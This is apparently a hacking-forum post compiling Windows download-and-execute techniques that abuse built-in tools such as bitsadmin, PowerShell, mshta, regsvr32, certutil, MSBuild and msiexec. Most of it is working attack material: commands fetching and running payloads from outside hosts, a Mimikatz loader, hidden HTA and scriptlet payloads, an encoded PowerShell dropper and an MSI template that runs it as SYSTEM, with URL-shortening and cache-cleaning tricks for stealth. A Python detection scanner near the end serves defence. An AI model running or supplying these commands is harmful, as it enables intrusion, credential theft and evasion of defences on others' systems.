Title: Windows download-and-execute command compendium

taibeihacker (Moderator)

1. bitsadmin (can only download to a specified local path; Windows 7 and later):

bitsadmin /transfer myDownLoadJob /download /priority normal "https://hackerninja.org/tu/atzsppzqibe24099.jpg" "d:\abc.jpg"
bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe & %APPDATA%\d90f.exe & del %APPDATA%\d90f.exe

2. PowerShell download and execute (Windows 7 and later):

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/m...it/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.168.183/1.exe','C:\111111111111111.exe')
powershell -w hidden -c (new-object System.Net.WebClient).DownloadFile('https://hackerninja.org/tu/atzsppzqibe24099.jpg','d:\1.jpg')

3. mshta download and execute

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
(the same via a short URL from http://sina.lt/: mshta http://t.cn/RYUQyF8)
mshta \\webdavserver\folder\payload.hta
payload.hta:
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>

4. rundll32 download and execute

rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/payload.sct");window.close();
Reference: https://github.com/3gstudent/Javascript-Backdoor

5. .NET regasm download and execute

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

6. cmd running a remote batch file:

cmd.exe /k \\webdavserver\folder\batchfile.txt

7. regsvr32 download and execute

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:https://hackerninja.org/tu/tzctdlfzlnw24100.png scrobj.dll
js.png (the scriptlet served at that URL):
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
    </script>
</registration>
</scriptlet>

8. certutil download and execute

certutil -urlcache -split -f http://webserver/payload payload
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
certutil -urlcache -split -f http://site.com/a a.exe & a.exe & del a.exe
certutil -urlcache -split -f http://192.168.254.102:80/a delete
(the last form removes the entry that certutil left in its URL cache)

9. .NET MSBuild download and execute

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

10. odbcconf download and execute

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

11. cscript remote script download and execute

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec3.sct
cscript //E:jscript \\webdavserver\folder\payload.txt
(The Printing_Admin_Scripts subfolder is locale-specific: zh-CN here, en-US on an English install.)
downfile.vbs:
' Set your settings
strFileURL = "https://hackerninja.org/tu/2nprwsn0rah24106.jpg"
strHDLocation = "c:\logo.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, False
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
  Set objADOStream = CreateObject("ADODB.Stream")
  objADOStream.Open
  objADOStream.Type = 1 ' adTypeBinary
  objADOStream.Write objXMLHTTP.ResponseBody
  objADOStream.Position = 0 ' Set the stream position to the start
  Set objFSO = CreateObject("Scripting.FileSystemObject")
  If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
  Set objFSO = Nothing
  objADOStream.SaveToFile strHDLocation
  objADOStream.Close
  Set objADOStream = Nothing
End If
Set objXMLHTTP = Nothing
Save the above as downfile.vbs.
Run it with: cscript downfile.vbs

12. pubprn.vbs download and execute

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/...a47e4075785016a62f7e5170ef36f5247cdb/test.sct

13. Built-in Windows copy commands

copy \\x.x.x.x\xx\poc.exe
xcopy d:\test.exe \\x.x.x.x\test.exe

14. IEXPLORE.EXE download and execute (requires an IE 0day)

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp

15. IEExec download and execute

C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec http://site.com/files/test64.exe
Reference: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

16. msiexec download and execute

msiexec /q /i https://hackerninja.org/tu/pp4bjvyet0l24111.png
I covered this method in two earlier articles, 《渗透测试中的msiexec》 and 《渗透技巧——从Admin权限切换到System权限》, so the details are not repeated here.
First, base64-encode the PowerShell download-and-execute code (PowerShell's -enc expects base64 over the UTF-16LE bytes of the command):
$fileContent = "(new-object System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:\download\a.exe');start-process 'c:\download\a.exe'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
$encoded = [System.Convert]::ToBase64String($bytes);
$encoded
Result:
KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
The full PowerShell command is:
powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
The full WiX file is:
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
    <Media Id="1" />
    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="Example">
          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
          </Component>
        </Directory>
      </Directory>
    </Directory>
    <Feature Id="DefaultFeature" Level="1">
      <ComponentRef Id="ApplicationFiles"/>
    </Feature>
    <Property Id="cmdline">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
    </Property>
    <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR"
        ExeCommand="[cmdline]" Return="ignore" Impersonate="no"/>
    <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
      invalid vbs to fail install
    </CustomAction>
    <InstallExecuteSequence>
      <Custom Action="SystemShell" After="InstallInitialize"></Custom>
      <Custom Action="FailInstall" Before="InstallFiles"></Custom>
    </InstallExecuteSequence>
  </Product>
</Wix>
Compile it into an MSI file with:
candle.exe msigen.wix
light.exe msigen.wixobj
This produces the MSI (test.msi here).
Usage: msiexec /q /i https://github.com/3gstudent/test/raw/master/test.msi
Note: after it runs, the msiexec.exe process has to be ended manually.
Combined with Baidu's URL shortener (http://dwz.cn/), the whole command fits in 34 characters:
msiexec /q /i http://dwz.cn/6UJpF8
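The flip side of sections 1 to 16, as an added example that is not from the original post or from any project it cites: a Python scanner a defender can run over process-creation command lines (Sysmon Event ID 1 or Security 4688) to flag the download-and-execute patterns catalogued above, and to turn a PowerShell -enc argument back into plaintext the way section 16 produced it (base64 over UTF-16LE). Python is used so it runs without a Windows host. Assumptions: the sample command lines are constructed for the demo, the regexes illustrate the indicators rather than being a vetted rule set, and PAGE_BLOB is the encoded command from section 16.

```python
"""Flag LOLBin download-and-execute command lines in process-creation logs.

Added example, not code from the original post. The rules mirror the binaries
and switches listed in sections 1 to 16; the sample command lines below are
constructed for the demo, not captured from a real host.
"""
import base64
import re
from typing import List, Tuple

# An http(s) URL or a UNC/WebDAV path (\\server\share\...), the two sources used on the page.
URL = r"(?:https?://|\\\\)[^\s'\"]+"

# (rule name, case-insensitive regex over the whole command line)
RULES: List[Tuple[str, str]] = [
    ("bitsadmin_transfer", r"\bbitsadmin(?:\.exe)?\b.*\s/transfer\b"),
    ("powershell_download", r"\bpowershell(?:\.exe)?\b.*(?:DownloadString|DownloadFile|\bIEX\b|Invoke-Expression)"),
    ("powershell_encoded", r"\bpowershell(?:\.exe)?\b.*\s-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ("mshta_remote", r"\bmshta(?:\.exe)?\s+(?:vbscript:|javascript:|" + URL + ")"),
    ("rundll32_script", r"\brundll32(?:\.exe)?\s+(?:javascript:|" + URL + ")"),
    ("regasm_uninstall", r"\bregasm(?:\.exe)?\s+/u\s+"),
    ("regsvr32_scriptlet", r"\bregsvr32(?:\.exe)?\b.*\s/i:" + URL + r".*\bscrobj\.dll"),
    ("certutil_urlcache", r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\s+" + URL),
    ("certutil_decode", r"\bcertutil(?:\.exe)?\b.*\s-decode\b"),
    ("installutil_uninstall", r"\binstallutil(?:\.exe)?\b.*\s/u\b"),
    ("msbuild_remote", r"\bmsbuild(?:\.exe)?\b.*" + URL),
    ("odbcconf_regsvr", r"\bodbcconf(?:\.exe)?\b.*\bregsvr\b"),
    ("pubprn_script_moniker", r"\bpubprn\.vbs\b.*\bscript:" + URL),
    ("cscript_remote", r"\b[cw]script(?:\.exe)?\b.*" + URL),
    ("msiexec_remote", r"\bmsiexec(?:\.exe)?\b.*\s/i\s+" + URL),
    ("ieexec_remote", r"\bieexec(?:\.exe)?\s+" + URL),
    ("caspol_security_off", r"\bcaspol(?:\.exe)?\b.*\s-s\s+off\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]
ENC_ARG = re.compile(r"\s-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

# The -enc argument from section 16 above (base64 of UTF-16LE text).
PAGE_BLOB = "KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA=="


def decode_encoded_command(blob: str) -> str:
    """Decode a PowerShell -EncodedCommand argument: base64 wrapping UTF-16LE text."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def extract_urls(text: str) -> List[str]:
    """Pull every URL / UNC path out of a command line or a decoded payload."""
    return re.findall(URL, text)


def scan_command_line(cmdline: str) -> dict:
    """Return the rule names that fire, the decoded -enc payload (if any) and every URL seen."""
    hits = [name for name, rx in COMPILED if rx.search(cmdline)]
    decoded = None
    m = ENC_ARG.search(cmdline)
    if m:
        try:
            decoded = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            decoded = None  # truncated or tampered blob: keep the hit, drop the payload
    urls = extract_urls(cmdline)
    if decoded:
        urls += extract_urls(decoded)  # the real download target is inside the blob
    return {"hits": hits, "decoded": decoded, "urls": urls}


def scan_log(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Reduce a batch of command lines to those that trip at least one rule."""
    flagged = []
    for line in cmdlines:
        hits = scan_command_line(line)["hits"]
        if hits:
            flagged.append((line, hits))
    return flagged


# Constructed sample process-creation command lines (not captured from a real host).
SAMPLE_CMDLINES = [
    "bitsadmin /transfer myDownLoadJob /download /priority normal http://site.com/a d:\\a.exe",
    "powershell IEX (New-Object Net.WebClient).DownloadString('http://webserver/Invoke-Mimikatz.ps1'); Invoke-Mimikatz",
    "powershell -WindowStyle Hidden -enc " + PAGE_BLOB,
    "mshta \\\\webdavserver\\folder\\payload.hta",
    'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/payload.sct");window.close();',
    "regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll",
    "certutil -urlcache -split -f http://webserver/payload.b64 payload.b64",
    "msiexec /q /i http://dwz.cn/6UJpF8",
    "cscript /b C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script:http://webserver/test.sct",
    "notepad.exe C:\\Users\\alice\\notes.txt",  # benign control
    "certutil -verify -urlfetch C:\\temp\\server.cer",  # certutil doing its day job
]

if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_CMDLINES):
        info = scan_command_line(line)
        print(f"{', '.join(hits):<40} {line[:70]}")
        if info["decoded"]:
            print(f"    decoded -enc: {info['decoded']}")
        print(f"    urls: {info['urls']}")
```

Two design points: the decoder surfaces the download URL that a plain command-line match never sees, because with -enc the only URL on the process line is inside the blob; and a blob that will not decode is still reported as a hit, since an attacker-truncated or log-truncated argument is a reason to look, not a reason to drop the event.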

17. Download-and-execute project: GreatSCT

 